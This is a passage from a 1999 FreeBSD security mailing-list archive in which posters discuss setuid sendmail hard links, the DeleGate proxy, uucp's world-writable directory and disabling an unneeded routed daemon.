Going through /var/log/setuid.today and changing the permissions > > on the programs seems like a good idea until I got to 'hoststat'. > > Look at the inode number - it's the same file as /usr/sbin/sendmail. > It's just there as a convenient hook. > > - Jordan > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message What Jordan said, but now with pictures. nautilus# set I=`ls -li /usr/bin/hoststat|cut -f1 -d" "` nautilus# find / -inum $I -ls 445461 592 -r-sr-xr-x 5 root wheel 290016 Feb 3 21:07 /usr/bin/newaliases 445461 592 -r-sr-xr-x 5 root wheel 290016 Feb 3 21:07 /usr/bin/mailq 445461 592 -r-sr-xr-x 5 root wheel 290016 Feb 3 21:07 /usr/bin/hoststat 445461 592 -r-sr-xr-x 5 root wheel 290016 Feb 3 21:07 /usr/sbin/sendmail 445461 592 -r-sr-xr-x 5 root wheel 290016 Feb 3 21:07 /usr/sbin/purgestat -- Yan To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 31 11:16:46 1999 Delivered-To: freebsd-security@freebsd.org Received: from mel.alcatel.fr (mel.alcatel.fr [212.208.74.132]) by hub.freebsd.org (Postfix) with ESMTP id C42BC14D45 for ; Wed, 31 Mar 1999 11:16:37 -0800 (PST) (envelope-from Stephane.Lentz@ansf.alcatel.fr) Received: from aifhs2.alcatel.fr (mailhub.alcatel.fr [155.132.180.80]) by mel.alcatel.fr (ALCANET/SMTP) with ESMTP id UAA23802 for ; Wed, 31 Mar 1999 20:14:28 +0200 Received: from sl95.ansf.alcatel.fr (nsfws7.ansf.alcatel.fr [159.217.81.12]) by aifhs2.alcatel.fr (ALCANET/SMTP2) with ESMTP id VAA23134 for ; Wed, 31 Mar 1999 21:12:09 +0200 (MET DST) Received: by sl95.ansf.alcatel.fr (Postfix, from userid 1003) id 9399274; Wed, 31 Mar 1999 21:15:54 +0100 (CET) Date: Wed, 31 Mar 1999 21:15:54 +0100 From: Stephane Lentz To: security@FreeBSD.ORG Subject: Opinions on DeleGate proxy (TIS FWTK's competitor ?) Message-ID: <19990331211554.A23722@ansf.alcatel.fr> Reply-To: Stephane.Lentz@ansf.alcatel.fr Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Mailer: Mutt 0.95.3i X-Unit: AI Organization: Alcanet International Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, I would like to know your opinion on a proxy that has not been discussed for quite a long time on this list and is seldom mentioned elsewhere : DeleGate Here is a résumé : - main URL http://www.delegate.org/delegate/ - general purpose TCP/IP proxy system (rotocols supported are FTP, Gopher, HTTP, NNTP, POP, SMTP, Telnet, Wais, X, LDAP, LPR, CU-SeeMe, Socks, ICP, SSL) - current version : 5.9.1 (released on 1999-03-15) - runs on Unix (including of course FreeBSD) + M$ platforms - mailing-list available at http://www.delegate.org/delegate/ml/delegate-en.html - FreeBSD port available (but only for version 5.7.2) http://www.freebsd.org/cgi/url.cgi?ftp://ftp.freebsd.org/pub/FreeBSD/FreeBSD-current/ports/net/delegate/pkg/DESCR - licence less restrictive than FWTK's one - updated regularly by the author what do you think about it ? Do you find it reliable and use it ? The only shortcomings I find for now are : - incomplete and unclear documentation bundled (few samples, not enough details, ...) - warnings during compilation on some platforms - some function calls in the code (I wonder if the code is "secure enough" and robust enough : buffer-overflows, memory-management, ...). Code reviews by security gurus ? - not widely used (mainly used in Japan) I did some tiny tests (only with HTTP, NNTP) and it worked. I didn't try it with SSLeay but plan to use it. I would like to know if it can cope with many users/ high traffic and if you know pros/cons. Regards, Stéphane. -- Stephane Lentz - = Stephane.Lentz@ansf.alcatel.fr ========== To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 31 11:22:51 1999 Delivered-To: freebsd-security@freebsd.org Received: from mel.alcatel.fr (mel.alcatel.fr [212.208.74.132]) by hub.freebsd.org (Postfix) with ESMTP id 470A3153F4 for ; Wed, 31 Mar 1999 11:22:38 -0800 (PST) (envelope-from Stephane.Lentz@ansf.alcatel.fr) Received: from aifhs2.alcatel.fr (mailhub.alcatel.fr [155.132.180.80]) by mel.alcatel.fr (ALCANET/SMTP) with ESMTP id UAA24410 for ; Wed, 31 Mar 1999 20:20:27 +0200 Received: from sl95.ansf.alcatel.fr (nsfws7.ansf.alcatel.fr [159.217.81.12]) by aifhs2.alcatel.fr (ALCANET/SMTP2) with ESMTP id VAA24258 for ; Wed, 31 Mar 1999 21:18:08 +0200 (MET DST) Received: by sl95.ansf.alcatel.fr (Postfix, from userid 1003) id 5D19374; Wed, 31 Mar 1999 21:21:53 +0100 (CET) Date: Wed, 31 Mar 1999 21:21:53 +0100 From: Stephane Lentz To: freebsd-security@FreeBSD.ORG Subject: Opinions on DeleGate proxy (TIS FWTK's competitor ?) Message-ID: <19990331212153.A23731@ansf.alcatel.fr> Reply-To: Stephane.Lentz@ansf.alcatel.fr Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: 8bit X-Mailer: Mutt 0.95.3i X-Unit: AI (Internet Services) Organization: Alcanet International Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi, I would like to know your opinion on a proxy that has not been discussed for quite a long time on this list and is seldom mentioned elsewhere : DeleGate Here is a résumé : - main URL http://www.delegate.org/delegate/ - general purpose TCP/IP proxy system (rotocols supported are FTP, Gopher, HTTP, NNTP, POP, SMTP, Telnet, Wais, X, LDAP, LPR, CU-SeeMe, Socks, ICP, SSL) - current version : 5.9.1 (released on 1999-03-15) - runs on Unix (including of course FreeBSD) + M$ platforms - mailing-list available at http://www.delegate.org/delegate/ml/delegate-en.html - FreeBSD port available (but only for version 5.7.2) http://www.freebsd.org/cgi/url.cgi?ftp://ftp.freebsd.org/pub/FreeBSD/FreeBSD-current/ports/net/delegate/pkg/DESCR - licence less restrictive than FWTK's one - updated regularly by the author What do you think about it ? Do you find it reliable and use it (any experience is welcome) ? The only shortcomings I find for now are : - incomplete and unclear documentation bundled (few samples, not enough details, ...) - warnings during compilation on some platforms - some function calls in the code (I wonder if the code is "secure enough" and robust enough : buffer-overflows, memory-management, ...). Code reviews by security gurus ? - not widely used (mainly used in Japan) I did some tiny tests (only with HTTP, NNTP) and it worked. I didn't try it with SSLeay but plan to use it. I would like to know if it can cope with many users/ high traffic and if you know pros/cons. Regards, Stéphane. -- Stephane Lentz - Alcanet International / Internet Services ======== Stephane.Lentz@ansf.alcatel.fr ========== To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 31 12:31:13 1999 Delivered-To: freebsd-security@freebsd.org Received: from hosting.doublesquare.com (hosting.doublesquare.com [195.5.128.151]) by hub.freebsd.org (Postfix) with ESMTP id B1C3915C8B for ; Wed, 31 Mar 1999 12:31:04 -0800 (PST) (envelope-from ark@eltex.ru) Received: from eltex.ru (ELTEX-2-SPIIRAS.nw.ru [195.19.204.46] (may be forged)) by hosting.doublesquare.com (8.8.8/8.8.8) with ESMTP id AAA09566 for ; Thu, 1 Apr 1999 00:04:16 +0400 (MSD) Received: from border.eltex.spb.ru (root@border.eltex.ru [195.19.198.2]) by eltex.ru (8.8.8/8.8.8) with SMTP id AAA02521; Thu, 1 Apr 1999 00:02:57 +0400 (MSD) Received: by border.eltex.spb.ru (ssmtp TIS-0.5alpha, 19 Oct 1998); Thu, 1 Apr 1999 00:02:54 +0400 Received: from undisclosed-intranet-sender id xma000665; Thu, 1 Apr 99 00:02:52 +0400 From: -=ArkanoiD=- Message-Id: <199903312002.AAA01152@paranoid.eltex.spb.ru> Subject: Re: Opinions on DeleGate proxy (TIS FWTK's competitor ?) In-Reply-To: <19990331212153.A23731@ansf.alcatel.fr> from Stephane Lentz at "Mar 31, 1999 09:21:53 pm" To: Stephane.Lentz@ansf.alcatel.fr Date: Thu, 1 Apr 1999 00:02:49 +0400 (MSD) Cc: freebsd-security@FreeBSD.ORG Reply-To: ark@eltex.ru X-Mailer: ELM [version 2.4ME+ PL53 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org nuqneH, Somebody (maybe you, Stephane Lentz) WROTE: [Charset iso-8859-1 unsupported, filtering to ASCII...] > What do you think about it ? > Do you find it reliable and use it (any experience is welcome) ? > > The only shortcomings I find for now are : > - incomplete and unclear documentation bundled (few samples, not enough details, ...) > - warnings during compilation on some platforms > - some function calls in the code (I wonder if the code is "secure enough" and > robust enough : buffer-overflows, memory-management, ...). Code reviews > by security gurus ? > - not widely used (mainly used in Japan) - monolythic, less flexible, harder to update and does not provide generic, easy to understand API to write addons. Security audit is not easy for similar reasons. I did not like it. -- _ _ _ _ _ _ _ {::} {::} {::} CU in Hell _| o |_ | | _|| | / _||_| |_ |_ |_ (##) (##) (##) /Arkan#iD |_ o _||_| _||_| / _| | o |_||_||_| [||] [||] [||] Do i believe in Bible? Hell,man,i've seen one! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 31 13: 2:40 1999 Delivered-To: freebsd-security@freebsd.org Received: from echonyc.com (echonyc.com [198.67.15.2]) by hub.freebsd.org (Postfix) with ESMTP id 6FAE015D61 for ; Wed, 31 Mar 1999 13:02:33 -0800 (PST) (envelope-from benedict@echonyc.com) Received: from localhost (benedict@localhost) by echonyc.com (8.9.3/8.9.3) with ESMTP id QAA27123; Wed, 31 Mar 1999 16:02:05 -0500 (EST) Date: Wed, 31 Mar 1999 16:02:05 -0500 (EST) From: Snob Art Genre Reply-To: ben@rosengart.com To: Brett Glass Cc: "'freebsd-security@FreeBSD.ORG'" Subject: Re: Virus Announcements In-Reply-To: <4.2.0.32.19990329225803.00a86c70@localhost> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 29 Mar 1999, Brett Glass wrote: > In the real world, none of us can avoid having to deal with Windows. > In many cases, it's the reason why our UNIX skills are so valuable. Speak for yourself. I don't deal with Windows, and I think all this Windows virus talk, while not intrinsically valueless, is out of place on FreeBSD lists. Ben "You have your mind on computers, it seems." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 31 13:58:37 1999 Delivered-To: freebsd-security@freebsd.org Received: from aniwa.sky (p45-max12.wlg.ihug.co.nz [216.100.145.45]) by hub.freebsd.org (Postfix) with ESMTP id 1AAA114CC4 for ; Wed, 31 Mar 1999 13:58:27 -0800 (PST) (envelope-from andrew@squiz.co.nz) Received: from aniwa.sky (localhost [127.0.0.1]) by aniwa.sky (8.9.1a/8.9.1) with ESMTP id JAA14685; Thu, 1 Apr 1999 09:31:32 +1200 (NZST) Message-Id: <199903312131.JAA14685@aniwa.sky> X-Mailer: exmh version 2.0.2 2/24/98 To: Stephane.Lentz@ansf.alcatel.fr Cc: security@FreeBSD.ORG Subject: Re: Opinions on DeleGate proxy (TIS FWTK's competitor ?) In-reply-to: Your message of "Wed, 31 Mar 1999 21:15:54 +0100." <19990331211554.A23722@ansf.alcatel.fr> Mime-Version: 1.0 Content-Type: text/plain; charset=iso-8859-1 Content-Transfer-Encoding: quoted-printable Date: Thu, 01 Apr 1999 09:31:32 +1200 From: Andrew McNaughton Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Hi, = > = > I would like to know your opinion on a proxy that has not been discusse= d > for quite a long time on this list and is seldom mentioned elsewhere : = DeleGate I didn't really get to know much of it, but it has some features which I = find useful, not for heavy weight use, but on my laptop. I like was the way it lays out it's http and ftp cache according to the = url. It's probably not as efficient as squid, but it does make it nice a= nd easy to set up a local search facility to find pages in it's cache and= translate the url's so everything gets fetched using the original URL an= d links up nicely. Also, I find it's logging better for squid for looking at exactly what's = going through in the headers while browsing the web, which has been usefu= l for debugging on occasion. (Can someone reccomend a more general tool = for analyzing tcp sessions and presenting in legible form) I can't vouch one way or the other for how it performs doing more seriou= s work. Andrew McNaughton -- = ----------- Andrew McNaughton andrew@squiz.co.nz http://www.newsroom.co.nz/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Wed Mar 31 22:26:44 1999 Delivered-To: freebsd-security@freebsd.org Received: from obie.softweyr.com (unknown [204.68.178.33]) by hub.freebsd.org (Postfix) with ESMTP id 34AB5151AF for ; Wed, 31 Mar 1999 22:26:41 -0800 (PST) (envelope-from wes@softweyr.com) Received: from softweyr.com (wes@zaphod.softweyr.com [204.68.178.35]) by obie.softweyr.com (8.8.8/8.8.8) with ESMTP id XAA05108; Wed, 31 Mar 1999 23:26:09 -0700 (MST) (envelope-from wes@softweyr.com) Message-ID: <37031181.D0D91D6E@softweyr.com> Date: Wed, 31 Mar 1999 23:26:09 -0700 From: Wes Peters Organization: Softweyr llc X-Mailer: Mozilla 4.5 [en] (X11; U; FreeBSD 3.1-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: ben@rosengart.com Cc: Brett Glass , "'freebsd-security@FreeBSD.ORG'" Subject: Re: Virus Announcements References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Snob Art Genre wrote: > > On Mon, 29 Mar 1999, Brett Glass wrote: > > > In the real world, none of us can avoid having to deal with Windows. > > In many cases, it's the reason why our UNIX skills are so valuable. > > Speak for yourself. I don't deal with Windows, and I think all this > Windows virus talk, while not intrinsically valueless, is out of place > on FreeBSD lists. Except as an amusing anecdote on why we don't use Wankers 95. Monday morning I woke up to a report by one of the talking heads on "The Today Show" about how this email virus was affecting "all computer users." I told my wife before learning anything more about it that it didn't affect "all computer users," nor would it affect her. I was certain it would turn out to be yet another MS-Bug being tickled, and was I right or what? The best way to secure PCs is to remove all traces of Microsoft slop- ware from them, even the boot sector. -- "Where am I, and what am I doing in this handbasket?" Wes Peters Softweyr LLC http://www.softweyr.com/~softweyr wes@softweyr.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 1 23:14:35 1999 Delivered-To: freebsd-security@freebsd.org Received: from shibumi.feralmonkey.org (shibumi.feralmonkey.org [203.41.114.182]) by hub.freebsd.org (Postfix) with ESMTP id 2B8FE15295 for ; Thu, 1 Apr 1999 23:14:31 -0800 (PST) (envelope-from nick@shibumi.feralmonkey.org) Received: from localhost (nick@localhost) by shibumi.feralmonkey.org (8.9.2/8.9.2) with ESMTP id SAA08382 for ; Fri, 2 Apr 1999 18:12:50 GMT (envelope-from nick@shibumi.feralmonkey.org) Date: Fri, 2 Apr 1999 18:12:49 +0000 (GMT) From: 0x1c To: freebsd-security@freebsd.org Subject: uucp home dir mode 777? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On my 2.2.8-REL box and my 3.1-REL box the modes for use uucp's home dir are both 777. Is there any particular reasoning behind this? Nick -- Therefore those skilled at the unorthodox are as infinite as heaven and earth, inexhaustible as the great rivers. -- Sun Tzu, The Art of War To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Apr 1 23:39:59 1999 Delivered-To: freebsd-security@freebsd.org Received: from phluffy.fks.bt (net25-cust199.pdx.wantweb.net [24.236.25.199]) by hub.freebsd.org (Postfix) with ESMTP id 91A0315056 for ; Thu, 1 Apr 1999 23:39:45 -0800 (PST) (envelope-from myke@ees.com) Received: from localhost (myke@localhost) by phluffy.fks.bt (8.8.8/8.8.8) with ESMTP id XAA18528; Thu, 1 Apr 1999 23:39:10 -0800 (PST) (envelope-from myke@ees.com) Date: Thu, 1 Apr 1999 23:39:09 -0800 (PST) From: Mike Holling X-Sender: myke@phluffy.fks.bt To: 0x1c Cc: freebsd-security@FreeBSD.ORG Subject: Re: uucp home dir mode 777? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > On my 2.2.8-REL box and my 3.1-REL box the modes for use uucp's home dir > are both 777. Is there any particular reasoning behind this? UUCP requires the "public" directory to be mode 777. If you don't use UUCP, you can get rid of it altogether. - Mike To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 2 6: 4:31 1999 Delivered-To: freebsd-security@freebsd.org Received: from aniwa.sky (p55-max12.wlg.ihug.co.nz [216.100.145.55]) by hub.freebsd.org (Postfix) with ESMTP id BD04914E1A for ; Fri, 2 Apr 1999 06:04:25 -0800 (PST) (envelope-from andrew@squiz.co.nz) Received: from aniwa.sky (localhost [127.0.0.1]) by aniwa.sky (8.9.1a/8.9.1) with ESMTP id CAA16855; Sat, 3 Apr 1999 02:03:40 +1200 (NZST) Message-Id: <199904021403.CAA16855@aniwa.sky> X-Mailer: exmh version 2.0.2 2/24/98 To: Mike Holling Cc: 0x1c , freebsd-security@FreeBSD.ORG Subject: Re: uucp home dir mode 777? In-reply-to: Your message of "Thu, 01 Apr 1999 23:39:09 PST." Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Sat, 03 Apr 1999 02:03:39 +1200 From: Andrew McNaughton Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > > On my 2.2.8-REL box and my 3.1-REL box the modes for use uucp's home dir > > are both 777. Is there any particular reasoning behind this? > > UUCP requires the "public" directory to be mode 777. If you don't use > UUCP, you can get rid of it altogether. > > - Mike I don't use UUCP, and have disabled it. I have wondered though if this public home dir was exploitable. There was discussion a while back about removing uucp from the base install and putting it in a port instead. Andrew -- ----------- Andrew McNaughton andrew@squiz.co.nz http://www.newsroom.co.nz/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 2 8:43: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id D803014C13 for ; Fri, 2 Apr 1999 08:43:01 -0800 (PST) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id IAA69531; Fri, 2 Apr 1999 08:42:38 -0800 (PST) (envelope-from dillon) Date: Fri, 2 Apr 1999 08:42:38 -0800 (PST) From: Matthew Dillon Message-Id: <199904021642.IAA69531@apollo.backplane.com> To: Andrew McNaughton Cc: Mike Holling , 0x1c , freebsd-security@FreeBSD.ORG Subject: Re: uucp home dir mode 777? References: <199904021403.CAA16855@aniwa.sky> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :I don't use UUCP, and have disabled it. I have wondered though if this public :home dir was exploitable. : :There was discussion a while back about removing uucp from the base install :and putting it in a port instead. : :Andrew :-- :----------- :Andrew McNaughton :andrew@squiz.co.nz :http://www.newsroom.co.nz/ Not so much exploitable as annoying. I'd like to see it moved out of the base install too. -Matt Matthew Dillon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 2 11:46:45 1999 Delivered-To: freebsd-security@freebsd.org Received: from host07.rwsystems.net (kasie.rwsystems.net [209.197.192.103]) by hub.freebsd.org (Postfix) with ESMTP id CC70F14CB3 for ; Fri, 2 Apr 1999 11:46:41 -0800 (PST) (envelope-from jwyatt@RWSystems.net) Received: from kasie.rwsystems.net([209.197.192.103]) (1162 bytes) by host07.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Fri, 2 Apr 1999 13:37:35 -0600 (CST) (Smail-3.2.0.104 1998-Nov-20 #1 built 1998-Dec-24) Date: Fri, 2 Apr 1999 13:37:23 -0600 (CST) From: James Wyatt To: 0x1c Cc: freebsd-security@freebsd.org Subject: Re: uucp home dir mode 777? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 2 Apr 1999, 0x1c wrote: > On my 2.2.8-REL box and my 3.1-REL box the modes for use uucp's home dir > are both 777. Is there any particular reasoning behind this? This is not needed unless you are doing *anonymous* UUCP and allowing local users to put files there. (I usually have a uucpmgr user that owns /etc/uucp or /usr/lib/uucp and disable anon UUCP.) chmod it to 0 or 755 if you run UUCP or remove it if you don't. You can still support anon UUCP without it, but local users won't be able to exchange files with it. Hope this helps - Jy@ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 2 11:47:16 1999 Delivered-To: freebsd-security@freebsd.org Received: from host07.rwsystems.net (kasie.rwsystems.net [209.197.192.103]) by hub.freebsd.org (Postfix) with ESMTP id A814D14F76 for ; Fri, 2 Apr 1999 11:47:08 -0800 (PST) (envelope-from jwyatt@RWSystems.net) Received: from kasie.rwsystems.net([209.197.192.103]) (1502 bytes) by host07.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Fri, 2 Apr 1999 13:42:03 -0600 (CST) (Smail-3.2.0.104 1998-Nov-20 #1 built 1998-Dec-24) Date: Fri, 2 Apr 1999 13:42:00 -0600 (CST) From: James Wyatt To: Andrew McNaughton Cc: Mike Holling , 0x1c , freebsd-security@FreeBSD.ORG Subject: Re: uucp home dir mode 777? In-Reply-To: <199904021403.CAA16855@aniwa.sky> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sat, 3 Apr 1999, Andrew McNaughton wrote: > > > On my 2.2.8-REL box and my 3.1-REL box the modes for use uucp's home dir > > > are both 777. Is there any particular reasoning behind this? > > > > UUCP requires the "public" directory to be mode 777. If you don't use > > UUCP, you can get rid of it altogether. > > > > - Mike > > I don't use UUCP, and have disabled it. I have wondered though if this public > home dir was exploitable. > > There was discussion a while back about removing uucp from the base install > and putting it in a port instead. The only thing the public dir can really do is allow someone to fill up a filesystem. A frequently large one at that. I'd rather not see it become a port, but wouldn't mind shipping with anon UUCP disabled. Kinda like we do with anon FTP now. - Jy@ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 2 14:19:18 1999 Delivered-To: freebsd-security@freebsd.org Received: from frmug.org (frmug-gw.frmug.org [193.56.58.252]) by hub.freebsd.org (Postfix) with ESMTP id 1245A14E84 for ; Fri, 2 Apr 1999 14:19:09 -0800 (PST) (envelope-from roberto@keltia.freenix.fr) Received: (from uucp@localhost) by frmug.org (8.9.1/frmug-2.3/nospam) with UUCP id AAA08235 for freebsd-security@FreeBSD.ORG; Sat, 3 Apr 1999 00:18:49 +0200 (CEST) (envelope-from roberto@keltia.freenix.fr) Received: by keltia.freenix.fr (Postfix, from userid 101) id 1A82A87B6; Fri, 2 Apr 1999 23:50:44 +0200 (CEST) Date: Fri, 2 Apr 1999 23:50:44 +0200 From: Ollivier Robert To: freebsd-security@FreeBSD.ORG Subject: Re: uucp home dir mode 777? Message-ID: <19990402235043.A71664@keltia.freenix.fr> Mail-Followup-To: freebsd-security@FreeBSD.ORG References: <199904021403.CAA16855@aniwa.sky> <199904021642.IAA69531@apollo.backplane.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii User-Agent: Mutt/0.95.3i In-Reply-To: <199904021642.IAA69531@apollo.backplane.com>; from Matthew Dillon on Fri, Apr 02, 1999 at 08:42:38AM -0800 X-Operating-System: FreeBSD 4.0-CURRENT/ELF ctm#5173 AMD-K6 MMX @ 200 MHz Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org According to Matthew Dillon: > Not so much exploitable as annoying. I'd like to see it moved out of the > base install too. It is not that big and it is still widely used in some part of Europe (phone costs mainly and its efficiency). 100% of my mail is going through UUCP... It is like games (fortune and all), it has been part of UNIX for a long time. -- Ollivier ROBERT -=- FreeBSD: The Power to Serve! -=- roberto@keltia.freenix.fr FreeBSD keltia.freenix.fr 4.0-CURRENT #70: Sat Feb 27 09:43:08 CET 1999 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Fri Apr 2 17:36:41 1999 Delivered-To: freebsd-security@freebsd.org Received: from flood.ping.uio.no (flood.ping.uio.no [129.240.78.31]) by hub.freebsd.org (Postfix) with ESMTP id 0B95E152CF for ; Fri, 2 Apr 1999 17:36:36 -0800 (PST) (envelope-from des@flood.ping.uio.no) Received: (from des@localhost) by flood.ping.uio.no (8.9.2/8.9.1) id DAA87219; Sat, 3 Apr 1999 03:36:12 +0200 (CEST) (envelope-from des) To: Nicole Harrington Cc: freebsd-security@FreeBSD.ORG Subject: Re: Someone trying to route to my machine? References: From: Dag-Erling Smorgrav Date: 03 Apr 1999 03:36:11 +0200 In-Reply-To: Nicole Harrington's message of "Mon, 29 Mar 1999 09:56:34 -0800 (PST)" Message-ID: Lines: 14 X-Mailer: Gnus v5.5/Emacs 19.34 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Nicole Harrington writes: > Below are some messages I don't understand. Is someone trying to > route to my machine to do something? [...] > > Mar 29 03:47:43 ton Forwarded from XXXXXXX: Forwarded from > XXXXXXXX: routed[72]: static route 203.150.128.4/32 --> 0.0.0.0 > impossibly lacks ifp Why do you run routed? Unless that box is a backbone router on your LAN/WAN, you do not need, and should not run, routed. DES -- Dag-Erling Smorgrav - des@flood.ping.uio.no To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 3 12:27: 4 1999 Delivered-To: freebsd-security@freebsd.org Received: from xwin.nmhtech.com (xwin.nmhtech.com [208.138.46.10]) by hub.freebsd.org (Postfix) with ESMTP id 6568814E6C for ; Sat, 3 Apr 1999 12:27:02 -0800 (PST) (envelope-from nicole@xwin.nmhtech.com) Received: by xwin.nmhtech.com (Postfix, from userid 1001) id 249902EE1A; Sat, 3 Apr 1999 12:25:07 -0800 (PST) Content-Length: 1951 Message-ID: X-Mailer: XFMail 1.2 [p0] on FreeBSD X-Priority: 3 (Normal) Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: quoted-printable MIME-Version: 1.0 In-Reply-To: Date: Sat, 03 Apr 1999 12:25:07 -0800 (PST) From: Nicole Harrington To: Dag-Erling Smorgrav Subject: Re: Someone trying to route to my machine? Cc: freebsd-security@FreeBSD.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 03-Apr-99 My Secret Spies Reported That Dag-Erling Smorgrav wrote: > Nicole Harrington writes: >> Below are some messages I don't understand. Is someone trying to >> route to my machine to do something? [...] >>=20 >> Mar 29 03:47:43 ton Forwarded from XXXXXXX: Forwarded from >> XXXXXXXX: routed[72]: static route 203.150.128.4/32 --> 0.0.0.0 >> impossibly lacks ifp >=20 > Why do you run routed? Unless that box is a backbone router on your > LAN/WAN, you do not need, and should not run, routed. >=20 Yes, you are correct. I have turned it off, I never noticed it on. I have = been migrating my configs since 2.2.5 and I think it was on by default then or something. It certainly is a boneheaded thing to have on. (wap) Even so, if someone detected I was running routed, could they use that to = try to route to a machine for some nefarius reason? > DES > --=20 > Dag-Erling Smorgrav - des@flood.ping.uio.no >=20 >=20 > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message |\ __ /| (`\ =20 | o_o |__ ) ) =20 // \\ =20 nicole@nmhtech.com | http://www.webweaver.net/ webmistress@dangermouse.org | http://www.dangermouse.org -------------------------(((---(((----------------------- =20 - Powered by Coka Cola and FreeBSD - - Stong enough for a man - But made for a Woman - =20 - I'm not ADD - I'm just Multithreaded - - Microsoft: What bug would you like today? - ---------------------------------------------------------- SYSADMIN(1) Sysadmin is the keeper of all things computer, is generally harangued, must= be=20 supplied with caffeine, chocolate, and sushi in order to function=20 properly,=20 cannot be exposed to direct sunlight, and must not be allowed to have a lif= e. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 3 19:51:10 1999 Delivered-To: freebsd-security@freebsd.org Received: from federation.addy.com (federation.addy.com [207.239.68.2]) by hub.freebsd.org (Postfix) with ESMTP id BF6F314F01 for ; Sat, 3 Apr 1999 19:51:00 -0800 (PST) (envelope-from jim@federation.addy.com) Received: from localhost (jim@localhost) by federation.addy.com (8.8.5/8.6.12) with SMTP id WAA25211 for ; Sat, 3 Apr 1999 22:49:04 -0500 (EST) Date: Sat, 3 Apr 1999 22:49:03 -0500 (EST) From: Jim Sander Cc: freebsd-security@FreeBSD.ORG Subject: Re: Someone trying to route to my machine? In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Even so, if someone detected I was running routed, could they use that to try > to route to a machine for some nefarius reason? 